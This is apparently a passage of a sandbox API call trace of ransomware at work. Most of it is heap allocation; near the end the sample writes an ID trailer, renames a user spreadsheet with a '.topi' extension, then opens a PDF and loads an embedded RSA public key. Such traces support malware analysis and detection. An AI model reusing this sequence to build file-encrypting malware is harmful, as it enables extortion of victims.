returned 0x31d01f0 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97b0 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97c8 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d97c8 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d97b0 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97c8 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97b0 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.046] GetCurrentThreadId () returned 0x8c4 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f74a0 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.047] GetCurrentThreadId () returned 0x8c4 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97b0 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97c8 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9798 [0096.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d97e0 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97b0 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97b0 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97b0 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97e0 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97c8 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9798 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9780 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f2538 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.049] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f92d8*, nNumberOfBytesToWrite=0x5403, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f92d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x5403, lpOverlapped=0x0) returned 1 [0096.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f92d8 | out: hHeap=0x680000) returned 1 [0096.050] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5408, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.050] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.050] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.050] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.050] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.050] CloseHandle (hObject=0x6a8) returned 1 [0096.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0096.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.056] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0096.056] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\kjvzM0zTF.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\kjvzm0ztf.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\kjvzM0zTF.xls.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\kjvzm0ztf.xls.topi")) returned 1 [0096.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.057] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.058] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d683390, ftCreationTime.dwHighDateTime=0x1d5bcae, ftLastAccessTime.dwLowDateTime=0x7c516f60, ftLastAccessTime.dwHighDateTime=0x1d5b7ab, ftLastWriteTime.dwLowDateTime=0x7c516f60, ftLastWriteTime.dwHighDateTime=0x1d5b7ab, nFileSizeHigh=0x0, nFileSizeLow=0x9142, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NzE7TJwJoje1EO.pdf", cAlternateFileName="NZE7TJ~1.PDF")) returned 1 [0096.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0096.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0096.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\NzE7TJwJoje1EO.pdf") returned=".pdf" [0096.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\NzE7TJwJoje1EO.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\nze7tjwjoje1eo.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.058] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=37186) returned 1 [0096.058] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.061] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x911c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.061] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.062] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.062] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x9142, lpOverlapped=0x0) returned 1 [0096.062] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.063] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.063] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.063] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.063] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.064] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.064] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.064] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.064] GetLastError () returned 0x0 [0096.064] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.064] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.064] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.064] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.064] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9140) returned 0x99f92d8 [0096.064] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.064] 